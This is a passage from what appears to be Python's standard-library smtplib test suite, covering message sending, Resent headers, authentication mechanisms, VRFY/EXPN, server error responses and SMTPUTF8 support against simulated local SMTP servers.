m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = socket_helper.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_buggy(self, arg=None):
# This AUTH mechanism will 'trap' client in a neverending 334
# base64 encoded 'BuGgYbUgGy'
self.push('334 QnVHZ1liVWdHeQ==')
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN_initial_response_ok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=True)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_LOGIN_initial_response_notok(self):
self.serv.add_feature("AUTH LOGIN")
with smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT) as smtp:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_login")
resp = smtp.auth("LOGIN", smtp.auth_login, initial_response_ok=False)
self.assertEqual(resp, (235, b'Authentication Succeeded'))
def testAUTH_BUGGY(self):
self.serv.add_feature("AUTH BUGGY")
def auth_buggy(challenge=None):
self.assertEqual(b"BuGgYbUgGy", challenge)
return "\0"
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT
)
try:
smtp.user, smtp.password = sim_auth
smtp.ehlo("test_auth_buggy")
expect = r"^Server AUTH mechanism infinite loop.*"
with self.assertRaisesRegex(smtplib.SMTPException, expect) as cm:
smtp.auth("BUGGY", auth_buggy, initial_response_ok=False)
finally:
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@hashlib_helper.requires_hashdigest('md5')
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
